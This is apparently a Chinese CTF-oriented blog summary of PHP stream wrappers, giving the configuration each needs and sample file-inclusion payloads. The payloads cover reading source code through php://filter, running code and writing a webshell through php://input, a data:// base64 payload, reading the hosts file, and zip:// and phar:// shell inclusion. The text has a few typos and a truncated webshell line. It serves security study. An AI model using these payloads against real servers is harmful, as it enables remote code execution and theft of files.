php伪协议总结
概述
PHP伪协议,也是php支持的协议和封装协议
常见的伪协议有:
php://访问各个输入输出流file://访问本地文件系统data://获取数据(RFC 2397)zip://获取压缩流phar://PHP归档http://访问网址zilb://压缩流ftp://访问ftpglob://查找匹配的文件路径模式ssh2://secure shell 2rar://RARogg://音频流expect://处理交互式的流
主要协议适用场景要求
1、php://协议
条件:allow_url_fopen:off/onallow_url_include :仅php://input php://stdin php://memory php://temp 需要on作用:php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。说明PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。
常用相关协议
php://filter
条件需要开启 allow_url_fopen用法?file=php://filter/convert.base64-encode/resource=xx.php?file=php://filter/read=convert.base64-encode/resource=xx.php
php://input
条件allow_url_fopen=on/offallow_url_include=on用法php://input + [POST DATA]执行php代码http://127.0.0.1/include.php?filephp://input[POST DATA]若有写权限,可以写入一句话木马http://127.0.0.1/include.php?file=php://input[POST DATA]'); ?>
file:\
条件allow_url_fopen=on/offallow_url_include=on/off 用法?file=file://C:\Windows\System32\drivers\etc\hosts//读取本地文件
data://
条件此协议需要在双on的情况下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入用法data://text/plain;base64,base64编码字符 http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=data://text/plain,字符 http://127.0.0.1/cmd.php?file=data://text/plain, plain后写要传入的内容。
zip://
条件allow_url_fopen和allow_url_include的启用与否无关系用法zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]?file=zip://D:\phpstudy\WWW\x.zip%23shell.php
phar://
条件allow_url_fopen和allow_url_include的启用与否无关系php版本大于等于5.3.0用法phar://压缩包名/内部文件名?file=phar://D:\phpstudy\WWW\x.zip/shell.php
还有其他的压缩包协议
参考链接
来源地址:https://blog.csdn.net/qq_45554491/article/details/127971872